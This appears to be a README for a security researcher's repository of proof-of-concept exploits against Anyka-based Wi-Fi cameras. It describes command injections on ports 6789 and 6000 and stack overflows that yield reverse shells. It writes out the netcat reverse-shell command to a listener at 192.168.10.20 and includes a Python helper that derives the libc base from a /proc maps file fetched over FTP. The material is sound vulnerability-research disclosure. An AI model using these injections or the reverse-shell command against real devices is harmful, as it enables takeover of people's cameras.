This repository contains proof-of-concept exploits for obtaining a remote reverse shell on an Anyka-based wireless camera (mostly cheap AliExpress cameras) while the camera is hosting its own Wi-Fi hotspot. It also contains scripts for interacting with the various open ports on the device.
Analysing a Wireless Network Camera [1]: Teardown and Access Point Bugs
Analysing a Wireless Network Camera [2]: Popping Shells
These exploits/PoCs concern the daemon process running on the camera.
This script exploits a command injection on port 6789, which is hosted by the daemon process. It makes the camera execute the command nc 192.168.10.20 123 -e ash, giving a reverse shell to a listener at 192.168.10.20 on port 123. Both the address and the port are fixed in the injected command, so change them to match your own host and have the listener running before you run the script.
This script uses a global buffer overflow in the daemon's port 6789 handler together with requests to port 8192 to leak a pointer, then exploits a stack overflow in the daemon to establish a reverse shell to a listener at 192.168.10.20 on port 123.
This script uses the exposed FTP server to read /proc/425/maps (so it assumes the daemon is running as PID 425) and derive the libc base address in the daemon process, then exploits a stack overflow to establish a reverse shell to a listener at 192.168.10.20 on port 123.
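As an added illustration of the libc-base step used by the two stack-overflow PoCs above, not code from this repository, the following Python parses a /proc/<pid>/maps dump such as the one the FTP leak retrieves and derives the libc load base, with a small helper for the pointer-leak variant. The sample maps text, the uClibc library name, the FTP credentials and all function names are assumptions; only fetch_maps_over_ftp talks to a device, the rest runs offline on the embedded sample.

```python
import os
import re
from ftplib import FTP

# Basename patterns for a libc build: "libc.so.6", "libc-2.31.so" or the
# uClibc naming "libuClibc-<ver>.so" common on small embedded targets (assumed here).
LIBC_RE = re.compile(r"^lib(?:uClib)?c[-.]")

# Constructed sample of /proc/<pid>/maps output for illustration only; the
# addresses, paths and library version are assumptions, not from a real device.
SAMPLE_MAPS = """\
00008000-0001f000 r-xp 00000000 1f:02 1234       /usr/bin/daemon
00026000-00028000 rw-p 00016000 1f:02 1234       /usr/bin/daemon
00028000-00049000 rw-p 00000000 00:00 0          [heap]
b6e5f000-b6e61000 r-xp 00000000 1f:02 567        /lib/ld-uClibc.so.0
b6e68000-b6e69000 r--p 00001000 1f:02 567        /lib/ld-uClibc.so.0
b6e6a000-b6f0c000 r-xp 00000000 1f:02 890        /lib/libuClibc-0.9.33.2.so
b6f0c000-b6f14000 ---p 000a2000 1f:02 890        /lib/libuClibc-0.9.33.2.so
b6f14000-b6f16000 r--p 000a2000 1f:02 890        /lib/libuClibc-0.9.33.2.so
b6f16000-b6f17000 rw-p 000a4000 1f:02 890        /lib/libuClibc-0.9.33.2.so
b6f17000-b6f19000 rw-p 00000000 00:00 0
bef2a000-bef4b000 rw-p 00000000 00:00 0          [stack]
"""


def parse_maps(text):
    """Parse /proc/<pid>/maps text into (start, end, perms, file_offset, path) tuples."""
    entries = []
    for line in text.splitlines():
        parts = line.split(None, 5)  # anonymous mappings have no trailing path field
        if len(parts) < 5:
            continue
        start, end = (int(x, 16) for x in parts[0].split("-"))
        path = parts[5].strip() if len(parts) == 6 else ""
        entries.append((start, end, parts[1], int(parts[2], 16), path))
    return entries


def libc_base(text):
    """Return the load base of libc in the process the maps text came from.

    The base is the start of the libc mapping with file offset 0 (its first
    segment); if that segment is missing, fall back to the lowest libc mapping.
    Raises ValueError if no libc mapping is present at all.
    """
    libc = [e for e in parse_maps(text)
            if e[4] and LIBC_RE.match(os.path.basename(e[4]))]
    if not libc:
        raise ValueError("no libc mapping found")
    first_segment = [e for e in libc if e[3] == 0]
    return min(e[0] for e in (first_segment or libc))


def base_from_leak(leaked_ptr, offset_in_libc):
    """The pointer-leak route (as the port 8192 leak provides): given a pointer into
    libc and its known offset inside that libc build, recover the load base."""
    return leaked_ptr - offset_in_libc


def fetch_maps_over_ftp(host, pid, user="anonymous", password=""):
    """Download /proc/<pid>/maps from the camera's FTP server as text.
    The credentials are assumptions; use whatever the exposed server accepts."""
    chunks = []
    with FTP(host) as ftp:
        ftp.login(user, password)
        ftp.retrbinary("RETR /proc/%d/maps" % pid, chunks.append)
    return b"".join(chunks).decode("ascii", "replace")


if __name__ == "__main__":
    base = libc_base(SAMPLE_MAPS)
    print("libc base in sample: 0x%08x" % base)
```

The offset-0 rule matters because a leaked pointer or a later segment (the r--p or rw-p data mappings) sits above the real base; adding libc symbol offsets to anything but the first segment's start gives the wrong addresses for the stack-overflow payload.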
This script simply sends a request to port 8192 to retrieve some information about the camera.
These exploits/PoCs concern the anyka_ipc process running on the camera. This process links a shared library called libcloudapi, which listens on port 6000.
This script sends Wi-Fi credentials to the camera, which then attempts to connect to the specified AP.
This script returns the length of a log file. Note that the log directory it looks in is not created by default, so the request crashes the anyka_ipc process.
This script returns some camera details.
This script exploits a command injection in the port 6000 service hosted by libcloudapi to establish a reverse shell to a listener at 192.168.10.20 on port 123.
This script uploads the file with the given filename to the /tmp directory on the device.